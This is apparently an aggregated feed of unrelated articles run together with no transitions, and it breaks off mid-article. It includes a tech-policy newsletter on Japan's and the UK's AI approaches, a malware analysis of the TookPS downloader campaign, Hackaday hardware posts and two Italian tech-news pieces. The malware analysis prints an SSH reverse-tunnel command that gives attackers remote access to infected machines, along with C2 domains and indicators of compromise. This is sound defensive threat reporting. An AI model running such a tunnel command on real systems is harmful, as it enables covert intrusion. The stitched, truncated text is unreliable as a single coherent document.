The country's recently-announced AI proposals (overview here) are anything but a copy-paste of the EU's AI Act — unlike, ahem, what South Korea tabled. Some may not think Tokyo has gone far enough by only requiring AI companies to cooperate with government AI efforts. But the title of the legislation — "Bill on the Promotion of Research, Development and Utilization of Artificial Intelligence-Related Technologies" — makes clear the proposed rules are more about enabling the emerging technology within the economy, and not about curtailing its use due to concerns AI will undermine society.

The proposals also require Japan to align with "international standards." What those AI standards will be is currently unclear. But it's a hat tip to the wider global (read: Western) policymaking conversation around AI where Japan has continued to punch above its weight. That goes for everything from Tokyo's work around the so-called Hiroshima Process on generative AI to its closed-door leadership via the Organization for Economic Cooperation and Development on global data governance standards (crucial for the ongoing sharing of data internationally).

There are a couple of lessons from Japan's digital policymaking that apply to other countries seeking to make their mark.

First, don't try to do everything at once. Tokyo doesn't want to convince everyone to follow its lead. Instead, it often takes a pragmatic view on a small number of issues where it believes it can make a difference and that will benefit its local businesses/citizens.

Second, a willingness to play host to the bigger powers, which is what Japan did with the Hiroshima Process, can buy you international political capital, on both digital and non-digital issues, that you can tap into further down the line. Recognizing where a country can add value — as a convener, for instance — allows local officials to navigate the inherent difficulties when trying to balance the interests of the Great Digital Powers.

Thanks for reading the free monthly version of Digital Politics. Paid subscribers receive at least one newsletter a week. If that sounds like your jam, please sign up here.

Here's what paid subscribers read in March:
— Claims that online safety rules are censorship have gone global; Europe's digital rules are not seen to help its citizens; Global data flows are not slowing down. More here.
— A readout on Trump 2.0's approach to digital policy; Why Canada worries about US interference in its election; A debrief on the EU's AI 'gigafactories.' More here.
— Four ways that social media can be made more transparent and accountable via supporting how outsiders access platform data. More here.
— Why we need to come up with a better version of 'tech sovereignty;' Apple's antitrust loss in Brussels is good for (most) Big Tech; AI models' lack of regional diversity. More here.

That's where middle powers can truly come into their own. By outlining a nimble digital policy agenda that centers on a small number of targeted objectives — versus trying to boil the ocean with an overly-complex and broad agenda — countries beyond the EU, China and the US can find niche tech issues that benefit their local constituencies.

That's the positive view. Now for the negative: the UK.

I've already expressed my reservations for London's quixotic approach to digital policy. In short: the only thing that matters, really, is boosting foreign direct investment into the country's region-leading tech sector. And, to be clear, there's nothing wrong with that.

But that hasn't stopped British politicians and policymakers from trying to bite off more than they can chew on everything from online safety to artificial intelligence to digital competition. In recent years, the UK has swung for the fences on all three of those areas, promoting itself as a world-leading center of digital regulation and tech-related industry. You can have the Online Safety Act AND be home to scores of global platform workers. You can pass sophisticated digital antitrust rules AND support the acquisition of local startups by Big Tech giants.

Frankly, I just don't buy it. Unlike Japan, the UK tries to play in the same realm as the US, China and the EU, but doesn't have the economic firepower or the regulatory muscle to do that well. Instead, London finds itself in the worst of all worlds. A middle power (with a lot of strong attributes upon which to call) that is too small to play in the Big Leagues but is unable — or unwilling? — to relegate itself to the second tier where it could really make a difference.

That should be a warning to other countries seeking to find their own path on digital policymaking. Don't pretend you can go head-to-head with global powers when you'll only end up on the worse side of that encounter.

More importantly — and this is especially true for London and its longstanding desire to remain in lockstep with the US — don't change your own digital agenda to fit into the ever-changing policies of longstanding allies.

London's decision, at the last minute, not to sign the communiqué at the recent Paris AI Action Summit because the US had decided not to hurt that country's global reputation with not much upside gained with Washington. The UK's "will they, or won't they" approach to pulling back on exiting digital regulation equally has not positioned the Brits as a safe pair of hands in the ever complex world of global tech policy.

In short, when it comes to navigating a country's own path on digital policy, be more like Japan, and less like the UK.

Chart of the Week

DONALD TRUMP'S ADMINISTRATION WILL UNVEIL a cavalcade of global tariffs on April 2 which some in the White House are calling "Liberation Day."

Thankfully, much of the digital world has escaped these threats as negotiations via the World Trade Organization mostly exempted so-called "electronic transmissions" (read: online purchases) from such duties.

It's a good thing, too. At least for global trade. Over the last decade, trade via so-called "digitally-delivered services" has roughly doubled, based on global exports (see left chart) and imports (see right chart.)

Source: World Trade Organization

Geopolitics is coming for Trust & Safety Inc

LAST WEEK WAS THE SECOND INSTALLMENTof my (London-based) tech policy meet-up series known as "Marked as Urgent." I run it alongside Ben Whitelaw (and his Everything in Moderation newsletter) and Georgia Iacovou (and her Horrific/Terrific newsletter.) Photos here — and let me know if you're down for us bringing the roadshow to your city. We're game.

The topic of the night was: "What next for Trust & Safety?" Disclaimer: I can be a little like a one-trick pony. But I spoke about how the world of (international) politics is almost certainly going to hit the T&S industry like a ton of bricks in the coming months. I'm not sure many in the sector either know or are prepared for what is coming down the pike.

Let's walk through this.

First, there is a growing divide, in the democratic world, between the US and everyone else. No, I'm not talking about Washington's overall shift in policy. Instead, the likes of Australia, Canada and South Korea are quickly moving to impose rules on online platforms to moderate illegal speech — and force companies to explain exactly how they are doing that.

In the US, Trump's position on any form of content moderation — that it is a form of illegal censorship — is well known. It's now getting implemented via Congressional hearings, White House directives and efforts by US federal agencies. That comes despite a growing sophistication in the US-based trust and safety sector that remains arguably the largest, globally, despite the recent shift in political winds.

Second, this split between the US and everyone else on content moderation will force companies to pick sides. Some will do it happily (looking at you, Meta.) Others will shift gears out of either regulatory necessity or political calculation to keep them on the right side of specific world leaders. Yet there will be inherent conflicts when rank-and-file trust and safety experts continue the daily work of complying with national online safety rules, while companies' top executives make public statements about why they believe such work should be stopped.

**A message from Microsoft** New technologies like AI supercharge creativity, business, and more. At the same time, we must take steps to ensure AI is resistant to abuse. Our latest white paper, "Protecting the Public from Abusive AI-Generated Content across the EU," highlights the weaponization of women’s nonconsensual imagery, AI-powered scams and financial fraud targeting older adults, and the proliferation of synthetic child sexual abuse.

The paper outlines steps Microsoft is taking to combat these risks and provides recommendations as to how the EU's existing regulatory framework can be used to combat the abuse of AI-generated content by bad actors. We thank Women Political Leaders, the MenABLE project, the Internet Watch Foundation, the WeProtect Global Alliance, and the European Senior’s Union for their important work and support. Click here to read more.**

I don't envy those inside the platforms who will be stuck between those public statements and the day-to-day requirements of regulatory compliance.

Yet for those outside of the US, don't expect the political world to leave you alone, either.

Now that we are a couple of years into mandatory online safety regimes (well, almost a decade if you're in Australia), there are few lawmakers who are making the case, publicly, about why such rules are good for voters. Sure, national leaders make statements about online kids safety, digital terrorism or (Russian) foreign interference whenever a big news event happens. But there's no elected official really explaining to people why trust and safety is crucial to both creating a more inclusive online environment and (important for any politician) why it's in the country's national interest.

Sign up for Digital Politics

Thanks for getting this far. Enjoyed what you've read? Why not receive weekly updates on how the worlds of technology and politics are colliding like never before. The first two weeks of any paid subscription are free.

Subscribe
Email sent! Check your inbox to complete your signup.

No spam. Unsubscribe anytime.

That's a problem. It's a problem because, at some point, the White House is likely to impose retaliatory tariffs on a country that announces some form of fine and/or remedy on an American social media giant. The Trump 2.0 administration specifically called out the UK and EU online safety regimes for undermining freedom of speech. At this point, we should take Washington at its word about taking such future action.

If/when those tariffs start, which politician in those targeted countries is going to stand up for these regimes? Which leader will be willing to go to the mattresses to defend a national online safety regime so that it doesn't become a bargaining chip in wider trade negotiations with the US?

Currently, I don't see clear support from non-US politicians on those points. It should concern anyone working in the trust and safety industry that there is no mainstream politically buy-in for the work that they do. Especially, as stated above, when there's also growing internal apathy in many of these companies for that work, too.

In the coming months, I'm still unclear how this will play out. Both inside social media giants and within countries' political establishments. But what I do know is that all forms of platform governance will become increasingly intertwined with geopolitics in the months ahead.

Thanks for getting this far. If you're interested in sponsoring future editions of Digital Politics, please get in touch on digitalpolitics@protonmail.com

What I'm reading

— The European Commission announced $1.4 billion in financial support for artificial intelligence, cybersecurity and digital skills across the 27-country bloc. More here.

— The Carnegie Endowment for International Peace goes deep into how decentralized versions of social media platforms represent a new way to govern online spaces. More here.

— The US Office of the Director of National Intelligence published its annual threat assessment, including areas associated with tech. More here.

— Researchers from the University of Münster in Germany delved into how TikTok audio clips were used in disinformation campaigns related to the war in Ukraine. More here.

— British regulators explained why they believed the country's existing rules would foster the development of next-generation AI models. More here.

— The International Association of Privacy Professionals and Harvard's Berkman Klein Center for Internet & Society are organizing a two-day retreat for digital policy leaders in June. They've just opened up registrations here.

digitalpolitics.co/newsletter0…

In early March, we published a study detailing several malicious campaigns that exploited the popular DeepSeek LLM as a lure. Subsequent telemetry analysis indicated that the TookPS downloader, a malware strain detailed in the article, was not limited to mimicking neural networks. We identified fraudulent websites mimic official sources for remote desktop and 3D modeling software, alongside pages offering these applications as free downloads.

Malicious websites

UltraViewer, AutoCAD, and SketchUp are common business tools. Therefore, potential victims of this campaign include both individual users and organizations.

Our telemetry also detected file names such as “Ableton.exe” and “QuickenApp.exe”, alongside malicious websites. Ableton is music production software for composition, recording, mixing, and mastering, and Quicken is a personal finance app for tracking expenses, income, debts, and investments across various accounts.

TookPS

In our report on attacks exploiting DeepSeek as a lure, we outlined the infection chain initiated by Trojan-Downloader.Win32.TookPS. Let us delve into this. Upon infiltrating a victim’s device, the downloader reaches out to its C2 server, whose domain is embedded in its code, to retrieve a PowerShell script. Different malware samples communicate with different domains. For example, the file with the MD5 hash 2AEF18C97265D00358D6A778B9470960 reached out to bsrecov4[.]digital, which was inactive at the time of our research. It received the following base64-encoded command from that domain:

Original command

Decoding reveals the PowerShell command being executed:

The variable “$TookEnc” stores an additional base64-encoded data block, also executed in PowerShell. Decrypting this reveals the following command:

Decoded command from $TookEnc variable shown in the previous screenshot

Example of decrypting another command from $TookEnc variable

Although different samples contain different URLs, the command structure remains identical. These commands sequentially download and execute three PowerShell scripts from the specified URL. The first script downloads “sshd.exe”, its configuration file (“config”), and an RSA key file from the C2 server. The second script retrieves command-line parameters for “sshd” (remote server address, port, and username), and then runs “sshd”.

Example of a malicious PowerShell command generated by the PowerShell script:
ssh.exe -N -R 41431:localhost:109 Rc7DexAU73l@$ip_address -i "$user\.ssh\Rc7DexAU73l.41431" -f "$user\.ssh\config"
This command starts an SSH server, thereby establishing a tunnel between the infected device and the remote server. For authentication, it uses the RSA key downloaded earlier, and the server configuration is sourced from the “config” file. Through this tunnel, the attacker gains full system access, allowing for arbitrary command execution.

The third script attempts to download a modified version of the Backdoor.Win32.TeviRat malware onto the victim’s machine, which is a well-known backdoor. The sample we obtained uses DLL sideloading to modify and deploy the TeamViewer remote access software onto infected devices. In simple terms, the attackers place a malicious library in the same folder as TeamViewer, which alters the software’s default behavior and settings, hiding it from the user and providing the attackers with covert remote access. This campaign used the domain invoicingtools[.]com as the C2.

Part of the script that downloads Backdoor.Win32.TeviRat

Additionally, Backdoor.Win32.Lapmon.* is downloaded onto the compromised device. Unfortunately, we were not able to establish the exact delivery method. This backdoor uses the domain twomg[.]xyz as its C2.

In this manner, the attackers gain complete access to the victim’s computer in variety of ways.

Infrastructure

The malicious scripts and programs in this attack primarily used domains registered in early 2024, hosted at two IP addresses:

C2 domains and corresponding IPs

We found no legitimate user-facing resources at these IP addresses. Alongside the campaign-related domains, we also found other domains long blocked by our security solutions. This strongly suggests these attackers had used other tools prior to TookPS, Lapmon, and TeviRat.

Takeaways

The DeepSeek lure attacks were merely a glimpse into a large-scale campaign targeting both home users and organizations. The malware distributed by the attackers was disguised as popular software, including business-critical applications. They attempted to gain covert access to the victim’s device through a variety of methods after the initial infection.

To protect against these attacks, users are advised to remain vigilant and avoid downloading pirated software, which may represent a serious threat.

Organizations should establish robust security policies prohibiting software downloads from dubious sources like pirated websites and torrents. Additionally, regular security awareness training is essential for ensuring a proper level of employee vigilance.

IOCs

MD5
46A5BB3AA97EA93622026D479C2116DE
2DB229A19FF35F646DC6F099E6BEC51F
EB6B3BCB6DF432D39B5162F3310283FB
08E82A51E70CA67BB23CF08CB83D5788
8D1E20B5F2D89F62B4FB7F90BC8E29F6
D26C026FBF428152D5280ED07330A41C
8FFB2A7EFFD764B1D4016C1DF92FC5F5
A3DF564352171C207CA0B2D97CE5BB1A
2AEF18C97265D00358D6A778B9470960
8D0E1307084B4354E86F5F837D55DB87
7CB0CA44516968735E40F4FAC8C615CE
62CCA72B0BAE094E1ACC7464E58339C0
D1D785750E46A40DEF569664186B8B40
EE76D132E179623AD154CD5FB7810B3E
31566F18710E18F72D020DCC2FCCF2BA
F1D068C56F6023FB25A4F4F0CC02E9A1
960DFF82FFB90A00321512CDB962AA5B
9B724BF1014707966949208C4CE067EE

URLs
Nicecolns[.]com
sketchup-i3dmodels-download[.]top
polysoft[.]org
autocad-cracked[.]com
ultraviewer[.]icu
ultraview-ramotepc[.]top
bsrecov4[.]digital
downloader[.]monster
download[.]monster
pstuk[.]xyz
tukeps2ld[.]online
twomg[.]xyz
tuntun2[.]digital
invoicingtools[.]com
tu02n[.]website
inreport2[.]xyz
inrep[.]xyz

IPs
88[.]119.175.187
88[.]119.175.184
88[.]119.175.190

securelist.com/tookps/116019/

It’s official, we’re living in the future. Certainly that’s the only explanation for how [wrongbaud] was able to write a three-part series of posts on hacking a cheap electric toothbrush off of AliExpress.

As you might have guessed, this isn’t exactly a hack out of necessity. With a flair for explaining hardware hacking, [wrongbaud] has put this together as a practical “brush-up” (get it?) on the tools and concepts involved in reverse engineering. In this case, the Raspberry Pi is used as a sort of hardware hacking multi-tool, which should make it relatively easy to follow along.
Modified image data on the SPI flash chip.
The first post in the series goes over getting the Pi up and running, which includes setting up OpenOCD. From there, [wrongbaud] actually cracks the toothbrush open and starts identifying interesting components, which pretty quickly leads to the discovery of a debug serial port. The next step is harassing the SPI flash chip on the board to extract its contents. As the toothbrush has a high-res color display (of course it does), it turns out this chip holds the images which indicate the various modes of operation. He’s eventually able to determine how the images are stored, inject new graphics data, and write it back to the chip.

Being able to display the Wrencher logo on our toothbrush would already be a win in our book, but [wrongbaud] isn’t done yet. For the last series in the post, he shows how to extract the actual firmware from the microcontroller using OpenOCD. This includes how to analyze the image, modify it, and eventually flash the new version back to the hardware — using that debug port discovered earlier to confirm the patched code is running as expected.

If you like his work with a toothbrush, you’ll love seeing what [wrongbaud] can do with an SSD or even an Xbox controller.

hackaday.com/2025/04/02/a-toot…

Microsoft continua la sua strategia per costringere gli utenti di Windows 11 a usare un account Microsoft durante l’installazione del sistema operativo, chiudendo una dopo l’altra le scappatoie che permettevano di utilizzare un account locale. Ma la comunità degli utenti non si arrende e ha appena scoperto un nuovo trucco che rende il processo più semplice che mai!

Microsoft vs. account locali

Sin dal rilascio di Windows 11, Microsoft ha progressivamente reso più difficile la creazione di account locali, spingendo gli utenti verso un modello basato su servizi cloud. L’azienda giustifica questa scelta con la necessità di migliorare la sicurezza e l’integrazione con i suoi servizi, ma per molti utenti ciò rappresenta una forzatura che limita la libertà di scelta.

In passato, esistevano diverse soluzioni per aggirare questa restrizione, come l’uso di comandi nascosti o script dedicati. Tuttavia, Microsoft ha chiuso molte di queste porte, rendendo più complicato evitare la creazione di un account online. Ora, però, è emersa una nuova scappatoia!

Il nuovo metodo per bypassare l’account Microsoft

Il colosso di Redmond ha recentemente rimosso il noto script ‘BypassNRO.cmd’ dalle build di anteprima di Windows 11, rendendo più difficile aggirare l’obbligo dell’account Microsoft. Sebbene fosse ancora possibile intervenire manualmente nel Registro di sistema, il processo risultava più scomodo e complicato per gli utenti meno esperti.

Ma sabato scorso, un utente di X con il nickname “Wither OrNot” ha svelato un metodo molto più semplice. Il trucco? Un semplice comando che apre una finestra nascosta per la creazione di un account locale!

Ecco come fare:

1. Durante l’installazione di Windows 11, quando viene visualizzata la schermata “Connettiamoci a una rete”, premere Shift + F10 per aprire il prompt dei comandi.
2. Digitare il comando start ms-cxh:localonly e premere Invio.
3. Si aprirà una finestra per la creazione di un account locale.
4. Inserire i dati richiesti e cliccare su Avanti.
5. La configurazione proseguirà senza richiedere un account Microsoft!

Sicurezza e implicazioni del metodo

Se da un lato questa soluzione permette di mantenere il controllo sul proprio dispositivo, dall’altro va considerato il possibile impatto sulla sicurezza. Microsoft promuove l’uso di account online per abilitare funzionalità come la sincronizzazione dei dati, il ripristino password e una maggiore protezione contro il furto di credenziali. Tuttavia, alcuni utenti vedono queste misure più come un vincolo che un vantaggio.

Utilizzare un account locale può aumentare la privacy e ridurre la dipendenza dai servizi cloud di Microsoft, ma bisogna ricordarsi di adottare buone pratiche di sicurezza, come l’uso di password robuste e l’attivazione di misure di protezione locali.

Conclusione

Microsoft eliminerà anche questa possibilità? È ancora presto per dirlo. Tuttavia, a differenza del vecchio script ‘BypassNRO.cmd’, questo comando sembra essere più profondamente integrato nel sistema operativo, il che potrebbe renderne più difficile la rimozione.

Ancora una volta, la community dimostra di saper aggirare le limitazioni imposte da Microsoft, riaffermando il diritto degli utenti di scegliere come gestire i propri dispositivi. Il confronto tra chi difende la libertà di utilizzo e la visione cloud-first dell’azienda di Redmond continua senza sosta!

Nel frattempo, chi desidera mantenere il controllo sul proprio dispositivo ha ancora una possibilità. Per quanto tempo? Lo scopriremo solo nei prossimi aggiornamenti di Windows 11!

L'articolo Windows 11: Scoperto un Nuovo Trucco per Evitare l’Account Microsoft proviene da il blog della sicurezza informatica.

Tutti gli aggiornamenti dei driver grafici della serie DRM-Next sono stati inseriti con successo nel kernel Linux 6.15, ma lo stesso Linus Torvalds non era soddisfatto di uno dei componenti. Il codice in questione è un codice di test chiamato “hdrtest” incluso nella build principale del kernel e, secondo Torvalds, lascia “spazzatura” nell’albero sorgente. Con il suo tipico tono schietto, ha affermato che il codice “dovrebbe essere distrutto”, almeno dal punto di vista degli sviluppatori.

In una lettera alla mailing list pubblicata recentemente, Torvalds ha scritto che era irritato dall’introduzione della “odiosa spazzatura hdrtest” e che a) rallenta la build perché viene eseguita come parte di una build allmodconfig completa, anziché come un test separato su richiesta; b) lascia file casuali nelle directory include, ingombrando l’albero sorgente.

Ha fatto notare che in precedenza c’erano state lamentele in merito e che il codice non avrebbe dovuto essere inserito nel ramo principale in questa forma. “Perché questi test vengono eseguiti come parte di una build normale? — Torvalds era indignato. “Non aggiungiamo file di dipendenza casuali che corrompono l’albero sorgente.”

Ha anche aggiunto che era grazie a “git status” che si lamentava dei file spazzatura aveva notato il problema. Ma la cosa peggiore è che questi file interferiscono con il completamento del nome quando si lavora nella console. E aggiungerli a .gitignore, secondo lui, avrebbe solo mascherato il problema, non lo avrebbe risolto.

Ha finito per disabilitare temporaneamente hdrtest, contrassegnandolo come BROKEN. “Se vuoi eseguire questo hdrtest, fallo come parte dei tuoi test. Non far vedere agli altri quella cosa disgustosa sul tuo albero. È meglio renderlo un target di build separato come make drm-hdrtest piuttosto che parte della build standard”, ha concluso.

A prima vista, potrebbe sembrare che stiamo parlando di testare il supporto HDR (High Dynamic Range), soprattutto perché di recente Linux ha lavorato attivamente sulla gestione del colore e sulla gamma dinamica estesa. Tuttavia, a un esame più attento si è scoperto che “hdr” in questo caso significa header, ovvero file C-header. Il codice hdrtest è per il nuovo driver Intel Xe e viene utilizzato per verificare che gli header DRM siano scritti correttamente, siano autosufficienti e superino la verifica kernel-doc. Vale a dire, questo è un banale controllo di qualità dei file di servizio, semplicemente implementato in modo non riuscito.

Quindi l’intero ramo DRM-Next è già arrivato in Linux 6.15, ma ora gli sviluppatori devono ripulire le loro tracce, altrimenti Torvalds si assicurerà personalmente che hdrtest scompaia dal kernel principale.

L'articolo Torvalds furioso: “Distruggete questa spazzatura!” Il codice del kernel Linux sotto accusa proviene da il blog della sicurezza informatica.

First of all, we’d like to give a big shout-out to [Afrotechmods]! After a long hiatus, he has returned to YouTube with an awesome new video all about op-amp characteristics, looking at the relatively awful LM741 in particular. His particular way of explaining things has definitely helped many electronics newbies to learn new concepts quickly!

Operational amplifiers have been around for a long time. The uA741, now commonly known as the LM741, was indeed an incredible piece of technology when it was released. It was extremely popular through the 1970s and onward as it saved designers the chore of designing a discrete amplifier. Simply add a few external components, and you have a well-behaved amplifier.

But as the years went on, many new and greatly improved op-amps have been developed, but either because of nostalgia or reticence, many in the field (especially, it seems, professors teaching electronics) have continued to use the LM741 in examples and projects. This is despite its many shortcomings:

• Large input offset voltage
• Large input offset current
• Low gain-bandwidth product
• Miserable slew rate of only 0.5V/uS

And that’s not even the full list. Newer designs have vastly improved all of these parameters, often by orders of magnitude, yet the LM741 still appears in articles aimed at those new to electronics, even in 2025. There are literal drop-in replacements for the LM741, such as the TLC081 (not to be confused with the similarly named FET-input TL081), which has 32 times the slew rate, 10 times the gain-bandwidth product, and an input offset voltage almost 2 orders of magnitude better!

So, check out the full video below, learn about op-amp parameters, and start checking out modern op-amps!

youtube.com/embed/e67WiJ6IPlQ?…

hackaday.com/2025/04/01/why-th…

One of the most exciting trends we’ve seen over the last few years is the rise of truly personal computers — that is, bespoke computing devices that are built by individuals to fit their specific needs or wants. The more outlandish of these builds, often inspired by science fiction and sporting non-traditional layouts, tend to be lumped together under the term “cyberdecks”, but there are certainly builds where that description doesn’t quite stick, including the Cyber Writer from [Darbin Orvar].

With a 10-inch screen, you might think it was intended to be a portable, but its laser-cut Baltic birch plywood construction says otherwise. Its overall design reminds us of early computer terminals, and the 60% mechanical keyboard should help reinforce that feeling that you’re working on a substantial piece of gear from yesteryear.
There’s plenty of room inside for additional hardware.
The Cyber Writer is powered by the Raspberry Pi Zero W 2, which might seem a bit underpowered, but [Darbin] has paired it with a custom minimalist word processor. There’s not a lot of detail about the software, but the page for the project says it features integrated file management and easy email export of documents.

The software isn’t yet available to the public, but it sounds like [Darbin] is at least considering it. Granted, there’s already distraction-free writing software out there, but we’re pretty firm believers that there’s no such thing as too many choices.

If you’re looking for something a bit more portable, the impressive Foliodeck might be more your speed.

youtube.com/embed/sIItE5ro-ko?…

hackaday.com/2025/04/01/an-ele…

Early photography lacked the convenience of the stable roll film we all know, and instead relied on a set of processes which the photographer would have to master from film to final print. Photographic chemicals could be flammable or even deadly, and results took a huge amount of work.

The daguerreotype process of using mercury to develop pictures on polished metal, and the wet-collodion plate with its nitrocellulose solution are well-known, but as conservators at the British National Archives found out, there was another process that’s much rarer. The Pannotype uses a collodion emulsion, but instead of the glass plate used by the wet-plate process it uses a fabric backing.

We know so much about the other processes because they were subject to patents, but pannotype never had a patent due to a disagreement. Thus when the conservators encountered some pannotypes in varying states of preservation, they needed to apply modern analytical techniques to understand the chemistry and select the best methods of stabilization. The linked article details those analyses, and provides them with some pointers towards conserving their collection. We look forward to someone making pannotype prints here in 2025, after all it’s not the first recreation of early photography we’ve seen.

hackaday.com/2025/04/01/a-forg…

Lord Vetinari from the Discworld series is known for many things, but perhaps most of all a clock that doesn’t quite keep continuous time. Instead, it ticks away at random increments to infuriate those that perceive it, whilst keeping regular time over the long term. [iracigt] decided to whip up a real world version of this hilarious fictional timepiece.

The clock itself is an off-the-shelf timepiece purchased from Target for the princely sum of $5. However, it’s been deviously modified with an RP2040 microcontroller hidden away inside. The RP2040 is programmed to tick the clock at an average of once per second. But each tick itself is not so exact. Instead, there’s an erraticness to its beat – some ticks are longer, some shorter, in the classic Vetinari style. [iracigt] explains the nitty gritty of how it all works, from creating chaos with Markov chains to interfacing the RP2040 electronically with the cheap quartz clock movement.

If you’ve ever wanted to build one of these amusements yourself, [iracigt’s] writeup is a great place to start. Even better, it was inspired by an earlier post on these very pages! We love to see the community riff on a theme, and we’d love to see yours, too – so keep the tips coming, yeah? Video after the break.

youtube.com/embed/3vpgnc2ZdwQ?…

hackaday.com/2025/04/01/malfun…

Many of us know the basic Blink Arduino sketch, or have coded similar routines on other microcontrollers. Flashing an LED on and off—it doesn’t get much simpler than that. But how big should a blink sketch be? Or more importantly, how small could you get it? [Artful Bytes] decided to find out.

The specific challenge? “Write a program that runs on a microcontroller and blinks an LED. The ON and OFF times should be as close to 1000 ms as possible.” The challenge was undertaken using a NUCLEO-L432KC Cortex-M4 with 256 K of flash and 64 K of RAM.

We won’t spoil the full challenge, but it starts out with an incredibly inefficient AI & cloud solution. [Artful Bytes] then simplifies by switching to an RTOS approach, before slimming down further with C, assembly, and then machine code. The challenge was to shrink the microcontroller code as much as possible. However, you might notice the title of the video is “I Shrunk Blinky to 0 Bytes.” As it turns out, if you eliminate the digital code-running hardware entirely… you can still blink an LED with analog hardware. So, yes. 0 bytes is possible.

We’ve featured the world’s smallest blinky before, too, but in a physical sense rather than with regards to code size.

youtube.com/embed/9FTUa-2eIDU?…

hackaday.com/2025/04/01/shrink…

When a Loch Ness Monster story appears at the start of April, it pays to check the date on the article just to avoid red faces. But there should be no hoax with this one published on the last day of March, scientists from the UK’s National Oceanography Centre were conducting underwater robotics tests in Scotland’s Loch Ness, and stumbled upon a camera trap lost by Nessie-hunters in the 1970s. Just to put the cherry on the cake of a perfect news story, the submarine in question is the famous “Boaty McBoatface”, so named as a consolation after the British Antarctic Survey refused to apply the name to their new ship when it won an online competition.

The Most Extreme Instamatic in The World

Sadly the NOC haven’t released close-ups of the inner workings of the device.
The camera trap has survived five decades underwater thanks to a sturdy glass housing, and appears to be quite an ingenious device. A humble Kodak Instamatic camera with a 126 film and a flash bulb is triggered and has its film advanced by a clockwork mechanism, in turn operated by a bait line. Presumably because of the four flash bulbs in the Kodak’s flash cube, it’s reported that it could capture four images. The constant low temperature at the bottom of a very deep loch provided the perfect place to store exposed film, and they have even been able to recover some pictures. Sadly none of then contain a snap of Nessie posing for the camera.

An underwater photographic blind used in the 1970s. Immanuel Giel, Public domain.
We are not cryptozoologists here at Hackaday so we’re not postulating any theories about Nessie’s existence, but there is some interest to be found in the history of Nessie-hunting, and the complex array of technologies fielded by those who would seek to bag themselves a monster. There have been extensive sonar surveys of the loch, a variety of home-made and more professional submarines have probed its depths, many metres of film and videotape have been shot by Nessie-hunters with long lenses, and of course experts have pored over all the various photographs which over the years have claimed to prove the monster’s existence. Perhaps the epicentre for the world of Nessie-hunting has been the Loch Ness Project, whose website details a variety of the survey efforts. Surprisingly, though they had a connection with the Instamatic camera trap they don’t feature it on their website, something we expect to change now it has become newsworthy.

Where Cryptozoology Tourism Is A Thing

The metamorphosis of a legendary beast into a modern-day phenomenon has certainly gripped the tourist industry of the Great Glen, as you’ll see if you take the drive from Inverness to Fort William. Even if you’re not a true believer, it’s still fun to indulge in a bit of touristic gawping at the various Nessie-themed attractions, though on the occasions Hackaday writers have passed by those waters there’s been a marked lack of monstrous life forms. The Nessie-hunters bring a bit of pseudoscientific thrill to the experience, something the Loch Ness Centre in Drumandrochit positively encourage: they even recruit visitors into their annual Nessie-spotting event. After all, as the camera discovery shows, there is doubtless plenty more to be found in those waters, even the occasional (non-Nessie) monster.

Header image: Bob Jones, CC BY-SA 2.0 .

hackaday.com/2025/04/01/the-ev…

While there’s still a vaguely robot-shaped hole in our heart from the loss of the New York World Maker Faire, we do take comfort in the fact that smaller Maker Faire events are still happening all over the world, and some of them have managed to gain quite a bit of momentum over the last few years.

If you’re in the Northeast US, the Philadelphia Maker Faire is your best bet to scratch that peculiar itch that only seems to respond to a healthy blend of art, technology, and the occasional flamethrower. It will be returning to the Cherry Street Pier this Sunday, April 6th, and pay-what-you-can tickets are on sale now. The organizers encourage each attendee to only pay what they are able to afford, with several options ranging from zero to the $25 supporter level.

A look through the exhibits shows the sort of eclectic mix one would expect from a Maker Faire. Where else could you practice picking locks, learn how biodiesel is made, see a display of kinetic sculptures, and stitch together a felt plush monster, all under one roof?

There’s even a few projects on the list that regular Hackaday readers may recognize, such as the ultra-portable Positron 3D printer and the DirectTV dish turned backyard radio telescope built by Professor James Aguirre.

We’ve made the trip to the Philadelphia Maker Faire several times since its inception in 2019, and although it had the misfortune of starting right before COVID-19 came along and screwed up all of our carefully laid plans, the event has managed to find a foothold and continues to grow each year.

hackaday.com/2025/04/01/philad…

History is rather dull and unexciting to most people, which naturally invites exciting flights of fancy that can range from the innocent to outright conspiracies. Nobody truly believes that the astounding finds and (fully functioning) ancient mechanisms in the Indiana Jones & Uncharted franchises are real, with mostly intact ancient cities waiting for intrepid explorers along with whatever mystical sources of power, wealth or influence formed the civilization’s foundations before its tragic demise. Yet somehow Plato’s fictive Atlantis has taken on a life of its own, along with many other ‘lost’ civilizations, whether real or imagined.

Of course, if these aforementioned movies and video games were realistic, they would center around a big archaeological dig and thrilling finds like pot shards and cuneiform clay tablets, not ways to smite enemies and gain immortality. Nor would it involve solving complex mechanical puzzles to gain access to the big secret chamber, prior to walking out of the readily accessible backdoor. Reality is boring like that, which is why there’s a major temptation to spruce things up. With the Egyptian pyramids as well as similar structures around the world speaking to the human imagination, this has led to centuries of half-baked ideas and outright conspiracies.

Most recently, a questionable 2022 paper hinting at structures underneath the Pyramid of Khafre in Egypt was used for a fresh boost to old ideas involving pyramid power stations, underground cities and other fanciful conspiracies. Although we can all agree that the ancient pyramids in Egypt are true marvels of engineering, are we really on the cusp of discovering that the ancient Egyptians were actually provided with Forerunner technology by extraterrestrials?

The Science of Being Tragically Wrong

A section of the ‘runes’ at Runamo. (Credit: Entheta, Wikimedia)
In defense of fanciful theories regarding the Actual Truth about Ancient Egypt and kin, archaeology as we know it today didn’t really develop until the latter half of the 20th century, with the field being mostly a hobbyist thing that people did out of curiosity as well as a desire for riches. Along the way many comical blunders were made, such as the Runamo runes in Sweden that turned out to be just random cracks in dolerite.

Less funny were attempts by colonists to erase Great Zimbabwe (11th – ~17th century CE) and the Kingdom of Zimbabwe after the ruins of the abandoned capital were discovered by European colonists and explored in earnest by the 19th century. Much like the wanton destruction of local cultures in the Americas by European colonists and explorers who considered their own culture, religion and technology to be clearly superior, the history of Great Zimbabwe was initially rewritten so that no thriving African society ever formed on its own, but was the result of outside influences.

In this regard it’s interesting how many harebrained ideas about archaeological sites have now effectively flipped, with mystical and mythical properties being assigned and these ‘Ancients’ being almost worshipped. Clearly, aliens visited Earth and that led to pyramids being constructed all around the globe. These would also have been the same aliens or lost civilizations that had technology far beyond today’s cutting edge, putting Europe’s fledgling civilization to shame.

Hence people keep dogpiling on especially the pyramids of Giza and its surrounding complex, assigning mystical properties to their ventilation shafts and expecting hidden chambers with technology and treasures interspersed throughout and below the structures.

Lost Technology

The Giant’s Causeway in Northern Ireland. (Credit: code poet, Wikimedia)
